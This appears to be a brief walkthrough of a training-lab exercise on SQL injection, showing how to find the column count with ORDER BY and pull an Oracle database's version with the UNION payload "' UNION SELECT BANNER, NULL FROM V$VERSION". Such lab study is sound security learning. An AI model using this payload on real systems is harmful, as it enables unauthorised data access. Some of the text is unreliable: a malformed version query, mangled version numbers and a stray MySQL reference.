Problem Statement :
This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
Make the database retrieve the strings: ‘Oracle Database 11g Express Edition Release 188.8.131.52.0 – 64bit Production, PL/SQL Release 184.108.40.206.0 – Production, CORE 220.127.116.11.0 Production, TNS for Linux: Version 18.104.22.168.0 – Production, NLSRTL Version 22.214.171.124.0 – Production’
So there are various methods to get the version of the database. Depends on which DB you are using Example is it MS SQL or Is it Oracle.
So we need to run the query like to get the version of the database.
SELECT FROM @@Version
SELECT BANNER FROM V$VERSION
STEPS followed –
- Again same method used. First used ORDER by 1 / 2 etc.. To find the number of columns in this.
- Next is UNION attack command to retrieve the data in one single column.
' UNION SELECT BANNER, NULL FROM V$VERSION
Example from MYSQL Database